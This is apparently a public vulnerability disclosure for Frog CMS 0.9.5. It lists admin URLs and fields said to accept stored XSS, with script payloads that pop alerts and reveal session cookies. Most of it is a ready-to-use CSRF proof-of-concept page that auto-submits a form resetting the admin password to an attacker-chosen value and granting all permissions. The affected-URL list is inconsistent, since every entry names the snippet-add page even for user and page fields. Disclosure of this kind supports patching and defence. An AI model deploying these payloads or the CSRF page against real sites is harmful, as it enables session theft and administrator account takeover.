Frog CMS 0.9.5 Stored XSS and CSRF Vulnerabilities

This vulnerability was already reported, long back but is not still patched, here are details about vulnerability
Please note that this was already reported but I later on came to know about it so thought to disclose it just for information purpose.

Found below URL's affected by XSS :

1. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      snippet[name]
2. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      user[name]
3. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      page[slug], page[keywords]
4. http://127.0.0.1/frog_095/frog_095/admin/?/snippet/add      snippet[name]

P@yl0ads Used for Testing:

1. "><script>alert('h@ck3d by eXpl0i13r')</script>
2. "><script>alert(document.cookie +'\n'+document.domain)</script>

Stored XSS Payload

Stored XSS, Cookie Disclosed

Also this CMS is vulnerable to CSRF Attack, which can be exploited to change admin password

Code:

<html>

<head>

<script type="text/javascript" language="javascript">

 function submitform()

 {

  document.getElementById('myForm').submit();

 }

function selectchk()

 {

  var tab = document.getElementById("autocheck")

  var chk = tab.getElementsByTagName("input");

  var num = chk.length;

  

for (var i = 0; i < num; i++)

  {  

    status = chk[i].getAttribute("type");

    if ( status == "checkbox") {    

      chk[i].checked = true;     

   }

  }

}

</script>

</head>

<body>

<br>

<h1> CSRF Attack by eXpl0i13r </h1>

<br>

<form name="myForm" action="http://127.0.0.1/frog_095/frog_095/admin/?/user/edit/1" method="post">

<input class="textbox" id="user_name" maxlength="100" name="user[name]" size="100" type="text" value="admin">

<input class="textbox" id="user_email" maxlength="255" name="user[email]" size="255" type="text" value="">

<input class="textbox" id="user_username" maxlength="40" name="user[username]" size="40" type="text" value="admin">

<input class="textbox" id="user_password" maxlength="40" name="user[password]" size="40" type="password" value="eXpl0i13r"></td>

<input class="textbox" id="user_confirm" maxlength="40" name="user[confirm]" size="40" type="password" value="eXpl0i13r">

<div id="autocheck">

<input id="user_permission-administrator" name="user_permission[administrator]" type="checkbox" value="1">&nbsp;<label for="user_permission-administrator">Administrator</label>

<input id="user_permission-developer" name="user_permission[developer]" type="checkbox" value="2">&nbsp;<label for="user_permission-developer">Developer</label>

<input id="user_permission-editor" name="user_permission[editor]" type="checkbox" value="3">&nbsp;<label for="user_permission-editor">Editor</label>

</div>

</form>

<script type="text/javascript" language="javascript">

selectchk()

document.myForm.submit()

</script>

</body>

</html>

Attacker can craft such pages and provide links to Victim, which loads javascript to submit form and in turn changes admin password.